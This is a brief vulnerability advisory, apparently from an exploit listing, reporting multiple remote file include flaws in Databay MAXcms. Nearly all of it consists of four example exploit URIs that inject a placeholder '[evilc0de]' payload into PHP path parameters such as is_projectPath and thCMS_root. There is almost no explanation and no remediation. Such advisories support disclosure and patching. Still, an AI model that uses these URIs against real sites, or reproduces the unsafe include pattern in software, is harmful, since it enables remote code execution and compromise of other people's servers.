Databay MAXcms Multiple File Include Vulnerabilities

Databay MAXcms Multiple File Include Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URIs are available:

http://www.example.com/includes/InstantSite/inc.is_root.php?is_projectPath=[evilc0de]
http://www.example.com/classes/class.Tree.php?GLOBALS[thCMS_root]=[evilc0de]
http://www.example.com/class.thcsm_user.php?is_path=[evilc0de]
http://www.example.com/modul/mod.users.php?thCMS_root=[evilc0de]